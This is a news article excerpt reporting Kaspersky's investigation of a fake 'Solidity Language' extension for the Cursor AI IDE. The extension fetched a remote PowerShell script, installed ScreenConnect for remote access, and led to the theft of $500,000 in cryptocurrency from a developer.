A fake extension for the Cursor AI IDE code editor infected devices with remote access tools and infostealers, which, in one case, led to the theft of $500,000 in cryptocurrency from a Russian crypto developer.
Cursor AI IDE is an AI-powered development environment based on Microsoft's Visual Studio Code. It includes support for Open VSX, an alternative to the Visual Studio Marketplace, that allows you to install VSCode-compatible extensions to expand the software's functionality.
Kaspersky reports that they were called in to investigate a security incident where a Russian developer working in cryptocurrency reported that $500,00 in crypto was stolen from his computer. The machine had no antivirus software installed, but it was said to be clean.
Georgy Kucherin, a security researcher for Kaspersky, received an image of the device's hard drive, and after analyzing it, discovered a malicious JavaScript file named extension.js located in the .cursor/extensions directory.
The extension was named "Solidity Language" and was published on the Open VSX registry, claiming to be a syntax highlighting tool for working with Ethereum smart contracts
Although the plugin impersonated the legitimate Solidity syntax highlighting extension, it actually executed a PowerShell script from a remote host at angelic[.]su to download additional malicious payloads.
Extension.js file executing remote PowerShell script
Source: Kaspersky
The remote PowerShell script checked if the remote management tool ScreenConnect was already installed, and if not, executed another script to install it.
Once ScreenConnect was installed, the threat actors gained full remote access to the developer's computer. Using ScreenConnect, the threat actor uploaded and executed VBScript files that were used to download additional payloads to the device.
... continue reading